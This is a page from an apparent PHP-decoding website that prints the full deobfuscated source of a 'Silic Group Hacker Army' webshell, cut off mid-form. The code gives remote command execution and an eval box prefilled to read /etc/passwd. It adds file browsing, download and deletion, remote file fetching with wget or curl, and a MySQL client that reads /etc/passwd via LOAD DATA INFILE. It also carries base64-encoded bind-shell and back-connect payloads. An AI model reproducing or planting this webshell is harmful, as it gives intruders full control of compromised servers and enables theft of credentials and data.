Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php @session_start(); @set_time_limit(0); @error_reporting(0); $salt = "silic1234";..

Decoded Output download


if(isset($_GET['dl']) && ($_GET['dl'] != "")){ $file = $_GET['dl']; $filez = @file_get_contents($file); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($filez)); header("Content-disposition: attachment; filename=\"".basename($file)."\";"); echo $filez; exit; } elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != "")){ $file = $_GET['dlgzip']; $filez = gzencode(@file_get_contents($file)); header("Content-Type:application/x-gzip
"); header("Content-length: ".strlen($filez)); header("Content-disposition: attachment; filename=\"".basename($file).".gz\";"); echo $filez; exit; } if(isset($_GET['img'])){ @ob_clean(); $d = magicboom($_GET['y']); $f = $_GET['img']; $inf = @getimagesize($d.$f); $ext = explode($f,"."); $ext = $ext[count($ext)-1]; @header("Content-type: ".$inf["mime"]); @header("Cache-control: public"); @header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); @header("Cache-control: max-age=".(60*60*24*7)); @readfile($d.$f); exit; } $ver = "blackbap.org"; $software = getenv("SERVER_SOFTWARE"); if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE; else $safemode = FALSE; $system = @php_uname(); if(strtolower(substr($system,0,3)) == "win") $win = TRUE; else $win = FALSE; if(isset($_GET['y'])){ if(@is_dir($_GET['view'])){ $pwd = $_GET['view']; @chdir($pwd); } else{ $pwd = $_GET['y']; @chdir($pwd); } } if(!$win){ if(!$user = rapih(exe("whoami"))) $user = ""; if(!$id = rapih(exe("id"))) $id = ""; $prompt = $user." \$ "; $pwd = @getcwd().DIRECTORY_SEPARATOR; } else { $user = @get_current_user(); $id = $user; $prompt = $user." &gt;"; $pwd = realpath(".")."\"; $v = explode("\",$d); $v = $v[0]; foreach (range("A","Z") as $letter) { $bool = @is_dir($letter.":\"); if ($bool) { $letters .= "<a href=\"?y=".$letter.":\">[ "; if ($letter.":" != $v) {$letters .= $letter;} else {$letters .= "<span class=\"gaya\">".$letter."</span>";} $letters .= " ]</a> "; } } } if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE; $server_ip = @gethostbyname($_SERVER["HTTP_HOST"]); $my_ip = $_SERVER['REMOTE_ADDR']; $bindport = "13123"; $bindport_pass = "silic"; $pwds = explode(DIRECTORY_SEPARATOR,$pwd); $pwdurl = ""; for($i = 0 ; $i < sizeof($pwds)-1 ; $i++){ $pathz = ""; for($j = 0 ; $j <= $i ; $j++){ $pathz .= $pwds[$j].DIRECTORY_SEPARATOR; } $pwdurl .= "<a href=\"?y=".$pathz."\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>"; } if(isset($_POST['rename'])){ $old = $_POST['oldname']; $new = $_POST['newname']; @rename($pwd.$old,$pwd.$new); $file = $pwd.$new; } $buff = $software."<br />"; $buff .= $system."<br />"; if($id != "") $buff .= $id."<br />"; $buff .= "server ip : ".$server_ip." <span class=\"gaya\">|</span> your ip : ".$my_ip."<br />"; if($safemode) $buff .= "safemode <span class=\"gaya\">ON</span><br />"; else $buff .= "safemode <span class=\"gaya\">OFF<span><br />"; $buff .= $letters."&nbsp;&gt;&nbsp;".$pwdurl; function rapih($text){ return trim(str_replace("<br />","",$text)); } function magicboom($text){ if (!get_magic_quotes_gpc()) { return $text; } return stripslashes($text); } function showdir($pwd,$prompt){ $fname = array(); $dname = array(); if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE; $user = "????:????"; if($dh = opendir($pwd)){ while($file = readdir($dh)){ if(is_dir($file)){ $dname[] = $file; } elseif(is_file($file)){ $fname[] = $file; } } closedir($dh); } sort($fname); sort($dname); $path = @explode(DIRECTORY_SEPARATOR,$pwd); $tree = @sizeof($path); $parent = ""; $buff = " <form action=\"?y=".$pwd."&amp;x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\"> <table class=\"cmdbox\" style=\"width:50%;\"> <tr><td>$prompt</td><td><input onMouseOver=\"this.focus();\" id=\"cmd\" class=\"inputz\" type=\"text\" name=\"cmd\" style=\"width:400px;\" value=\"\" /><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr> </form> <form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <tr><td>view file/folder</td><td><input onMouseOver=\"this.focus();\" id=\"goto\" class=\"inputz\" type=\"text\" name=\"view\" style=\"width:400px;\" value=\"".$pwd."\" /><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr> </form></table><table class=\"explore\"> <tr><th>name</th><th style=\"width:80px;\">size</th><th style=\"width:210px;\">owner:group</th><th style=\"width:80px;\">perms</th><th style=\"width:110px;\">modified</th><th style=\"width:190px;\">actions</th></tr> "; if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR; else $parent = $pwd; foreach($dname as $folder){ if($folder == ".") { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $buff .= "<tr><td><a href=\"?y=".$pwd."\">$folder</a></td><td>LINK</td><td style=\"text-align:center;\">".$owner."</td><td>".get_perms($pwd)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($pwd))."</td><td><span id=\"titik1\"><a href=\"?y=$pwd&amp;edit=".$pwd."view.php\"></a> | <a href=\"javascript:tukar('titik1','titik1_form');\"></a></span> <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" /> </form></td></tr> "; } elseif($folder == "..") { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $buff .= "<tr><td><a href=\"?y=".$parent."\">$folder</a></td><td>LINK</td><td style=\"text-align:center;\">".$owner."</td><td>".get_perms($parent)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($parent))."</td><td><span id=\"titik2\"><a href=\"?y=$pwd&amp;edit=".$parent."view.php\"></a> | <a href=\"javascript:tukar('titik2','titik2_form');\"></a></span> <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" /> </form> </td></tr>"; } else { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $buff .= "<tr><td><a id=\"".clearspace($folder)."_link\" href=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\">[ $folder ]</a> <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /> <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" /> </form> <td>DIR</td><td style=\"text-align:center;\">".$owner."</td><td>".get_perms($pwd.$folder)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($folder))."</td><td><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\"></a> | <a href=\"?y=$pwd&amp;fdelete=".$pwd.$folder."\"></a></td></tr>"; } } foreach($fname as $file){ $full = $pwd.$file; if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($file)); $group=@posix_getgrgid(@filegroup($file)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $buff .= "<tr><td><a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&amp;view=$full\">$file</a> <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /> <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" /> </form> </td><td>".ukuran($full)."</td><td style=\"text-align:center;\">".$owner."</td><td>".get_perms($full)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($full))."</td> <td><a href=\"?y=$pwd&amp;edit=$full\"></a> | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\"></a> | <a href=\"?y=$pwd&amp;delete=$full\"></a> | <a href=\"?y=$pwd&amp;dl=$full\"></a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$full\">gzip</a>)</td></tr>"; } $buff .= "</table>"; return $buff; } function ukuran($file){ if($size = @filesize($file)){ if($size <= 1024) return $size; else{ if($size <= 1024*1024) { $size = @round($size / 1024,2);; return "$size kb"; } else { $size = @round($size / 1024 / 1024,2); return "$size mb"; } } } else return "???"; } function exe($cmd){ if(function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('exec')) { @exec($cmd,$results); $buff = ""; foreach($results as $result){ $buff .= $result; } return $buff; } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('shell_exec')){ $buff = @shell_exec($cmd); return $buff; } } function tulis($file,$text){ $textz = gzinflate(base64_decode($text)); if($filez = @fopen($file,"w")) { @fputs($filez,$textz); @fclose($file); } } function ambil($link,$file) { if($fp = @fopen($link,"r")){ while(!feof($fp)) { $cont.= @fread($fp,1024); } @fclose($fp); $fp2 = @fopen($file,"w"); @fwrite($fp2,$cont); @fclose($fp2); } } function which($pr){ $path = exe("which $pr"); if(!empty($path)) { return trim($path); } else { return trim($pr); } } function download($cmd,$url){ $namafile = basename($url); switch($cmd) { case 'wwget': exe(which('wget')." ".$url." -O ".$namafile);break; case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile);break; case 'wfread' : ambil($wurl,$namafile);break; case 'wfetch' : exe(which('fetch')." -o ".$namafile." -p ".$url);break; case 'wlinks' : exe(which('links')." -source ".$url." > ".$namafile);break; case 'wget' : exe(which('GET')." ".$url." > ".$namafile);break; case 'wcurl' : exe(which('curl')." ".$url." -o ".$namafile);break; default: break; } return $namafile; } function get_perms($file) { if($mode=@fileperms($file)){ $perms=''; $perms .= ($mode & 00400) ? 'r' : '-'; $perms .= ($mode & 00200) ? 'w' : '-'; $perms .= ($mode & 00100) ? 'x' : '-'; $perms .= ($mode & 00040) ? 'r' : '-'; $perms .= ($mode & 00020) ? 'w' : '-'; $perms .= ($mode & 00010) ? 'x' : '-'; $perms .= ($mode & 00004) ? 'r' : '-'; $perms .= ($mode & 00002) ? 'w' : '-'; $perms .= ($mode & 00001) ? 'x' : '-'; return $perms; } else return "??????????"; } function clearspace($text){ return str_replace(" ","_",$text); } $port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf"; $port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8="; $back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw=="; $back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw=="; ?> <html><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><title>::Silic Group Hacker Army PHP webshell - blackbap.org::</title> <script type="text/javascript"> function tukar(lama,baru){ document.getElementById(lama).style.display = 'none'; document.getElementById(baru).style.display = 'block'; } </script> <style type="text/css"> body{ background:#000000; } a { text-decoration:none; } a:hover{ border-bottom:1px solid #4C83AF; } *{ font-size:11px; font-family:Tahoma,Verdana,Arial,; color:#FFFFFF; } #menu{ background:#111111; margin:8px 2px 4px 2px; } #menu a{ padding:4px 18px; margin:0; background:#222222; text-decoration:none; letter-spacing:2px; } #menu a:hover{ background:#191919; border-bottom:1px solid #333333; border-top:1px solid #333333; } .tabnet{ margin:15px auto 0 auto; border: 1px solid #333333; } .main { width:100%; } .gaya { color: #4C83AF; } .inputz{ background:#111111; border:0; padding:2px; border-bottom:1px solid #222222; border-top:1px solid #222222; } .inputzbut{ background:#111111; color:#4C83AF; margin:0 4px; border:1px solid #444444; } .inputz:hover, .inputzbut:hover{ border-bottom:1px solid #4C83AF; border-top:1px solid #4C83AF; } .output { margin:auto; border:1px solid #4C83AF; width:100%; height:400px; background:#000000; padding:0 2px; } .cmdbox{ width:100%; } .head_info{ padding: 0 4px; } .b1{ font-size:30px; padding:0; color:#444444; } .b2{ font-size:30px; padding:0; color: #333333; } .b_tbl{ text-align:center; margin:0 4px 0 0; padding:0 4px 0 0; border-right:1px solid #333333; } .phpinfo table{ width:100%; padding:0 0 0 0; } .phpinfo td{ background:#111111; color:#cccccc; padding:6px 8px;; } .phpinfo th, th{ background:#191919; border-bottom:1px solid #333333; font-weight:normal; } .phpinfo h2, .phpinfo h2 a{ text-align:center; font-size:16px; padding:0; margin:30px 0 0 0; background:#222222; padding:4px 0; } .explore{ width:100%; } .explore a { text-decoration:none; } .explore td{ border-bottom:1px solid #333333; padding:0 8px; line-height:24px; } .explore th{ padding:3px 8px; font-weight:normal; } .explore th:hover , .phpinfo th:hover{ border-bottom:1px solid #4C83AF; } .explore tr:hover{ background:#111111; } .viewfile{ background:#EDECEB; color:#000000; margin:4px 2px; padding:8px; } .sembunyi{ display:none; padding:0;margin:0; } </style> </head> <body onLoad="document.getElementById('cmd').focus();"> <div class="main"> <!-- head info start here --> <div class="head_info"> <table><tr> <td><table class="b_tbl"><tr><td><a href="?"><span class="b1">Silic</span></a></td></tr><tr><td><?php echo $ver;?></td></tr></table></td> <td><?php echo $buff; ?></td> </tr></table> </div> <!-- head info end here --> <!-- menu start --> <div id="menu"> <a href="?<?php echo "y=".$pwd; ?>"></a> <a href="?<?php echo "y=".$pwd; ?>&amp;x=shell">shell</a> <a href="?<?php echo "y=".$pwd; ?>&amp;x=php">eval</a> <a href="?<?php echo "y=".$pwd; ?>&amp;x=mysql">mysql</a> <a href="?<?php echo "y=".$pwd; ?>&amp;x=phpinfo">phpinfo</a> <a href="?<?php echo "y=".$pwd; ?>&amp;x=netsploit">netsploit</a> <a href="?<?php echo "y=".$pwd; ?>&amp;x=upload"></a> <a href="?<?php echo "y=".$pwd; ?>&amp;x=mail">mail</a> </div> <!-- menu end --> <?php if(isset($_GET['x']) && ($_GET['x'] == 'php')){ ?> <form action="?y=<?php echo $pwd; ?>&amp;x=php" method="post"> <table class="cmdbox"> <tr><td> <textarea class="output" name="cmd" id="cmd"> <?php if(isset($_POST['submitcmd'])) { echo eval(magicboom($_POST['cmd'])); } else echo "echo file_get_contents('/etc/passwd');"; ?> </textarea> <tr><td><input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form> </table> </form> <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'mysql')){ if(isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport'])){ $sqlhost = $_GET['sqlhost']; $sqluser = $_GET['sqluser']; $sqlpass = $_GET['sqlpass']; $sqlport = $_GET['sqlport']; if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass)){ $msg .= "<div style=\"width:99%;padding:4px 10px 0 10px;\">"; $msg .= "<p>Connected to ".$sqluser."<span class=\"gaya\">@</span>".$sqlhost.":".$sqlport; $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;</span>&nbsp;&nbsp;<a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;\">[ databases ]</a>"; if(isset($_GET['db'])) $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;</span>&nbsp;&nbsp;<a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$_GET['db']."\">".htmlspecialchars($_GET['db'])."</a>"; if(isset($_GET['table'])) $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;</span>&nbsp;&nbsp;<a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$_GET['db']."&amp;table=".$_GET['table']."\">".htmlspecialchars($_GET['table'])."</a>"; $msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>"; $msg .= "</div>"; echo $msg; if(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery']))){ $db = $_GET['db']; $query = "DROP TABLE IF EXISTS silic_table;
CREATE TABLE `silic_table` ( `file` LONGBLOB NOT NULL );
LOAD DATA INFILE \"/etc/passwd\"
INTO TABLE silic_table;SELECT * FROM silic_table;
DROP TABLE IF EXISTS silic_table;"; $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">$query</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; $tables = array(); $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available tables on ".$db."</th></tr>"; $hasil = @mysql_list_tables($db,$con); while(list($table) = @mysql_fetch_row($hasil)){ @array_push($tables,$table); } @sort($tables); foreach($tables as $table){ $msg .= "<tr><td><a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."&amp;table=".$table."\">$table</a></td></tr>"; } $msg .= "</table>"; } elseif(isset($_GET['table']) && (!isset($_GET['sqlquery']))){ $db = $_GET['db']; $table = $_GET['table']; $query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;"; $msgq = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <input type=\"hidden\" name=\"table\" value=\"".$table."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; $columns = array(); $msg = "<table class=\"explore\" style=\"width:99%;\">"; $hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table); while(list($column) = @mysql_fetch_row($hasil)){ $msg .= "<th>$column</th>"; $kolum = $column; } $msg .= "</tr>"; $hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table); list($total) = mysql_fetch_row($hasil); if(isset($_GET['z'])) $page = (int) $_GET['z']; else $page = 1; $pagenum = 100; $totpage = ceil($total / $pagenum); $start = (($page - 1) * $pagenum); $hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum); while($datas = @mysql_fetch_assoc($hasil)){ $msg .= "<tr>"; foreach($datas as $data){ if(trim($data) == "") $data = "&nbsp;"; $msg .= "<td>$data</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; $head = "<div style=\"padding:10px 0 0 6px;\"> <form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <input type=\"hidden\" name=\"table\" value=\"".$table."\" /> Page <select class=\"inputz\" name=\"z\" onchange=\"this.form.submit();\">"; for($i = 1;$i <= $totpage;$i++){ $head .= "<option value=\"".$i."\">".$i."</option>"; if($i == $_GET['z']) $head .= "<option value=\"".$i."\" selected=\"selected\">".$i."</option>"; } $head .= "</select><noscript><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" /></noscript></form></div>"; $msg = $msgq.$head.$msg; } elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != "")){ $db = $_GET['db']; $query = magicboom($_GET['sqlquery']); $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; @mysql_select_db($db); $querys = explode(";",$query); foreach($querys as $query){ if(trim($query) != ""){ $hasil = mysql_query($query); if($hasil){ $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;<span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>"; $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr>"; for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>"; $msg .= "</tr>"; for($i=0;$i<@mysql_num_rows($hasil);$i++) { $rows=@mysql_fetch_array($hasil); $msg .= "<tr>"; for($j=0;$j<@mysql_num_fields($hasil);$j++) { if($rows[$j] == "") $dataz = "&nbsp;"; else $dataz = $rows[$j]; $msg .= "<td>".$dataz."</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; } else $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;<span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>"; } } } else { $query = "SHOW PROCESSLIST;
SHOW VARIABLES;
SHOW STATUS;"; $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; $dbs = array(); $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available databases</th></tr>"; $hasil = @mysql_list_dbs($con); while(list($db) = @mysql_fetch_row($hasil)){ @array_push($dbs,$db); } @sort($dbs); foreach($dbs as $db){ $msg .= "<tr><td><a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."\">$db</a></td></tr>"; } $msg .= "</table>"; } @mysql_close($con); } else $msg = "<p style=\"text-align:center;\">cant connect to mysql server</p>"; echo $msg; } else{ ?> <form action="?" method="get"> <input type="hidden" name="y" value="<?php echo 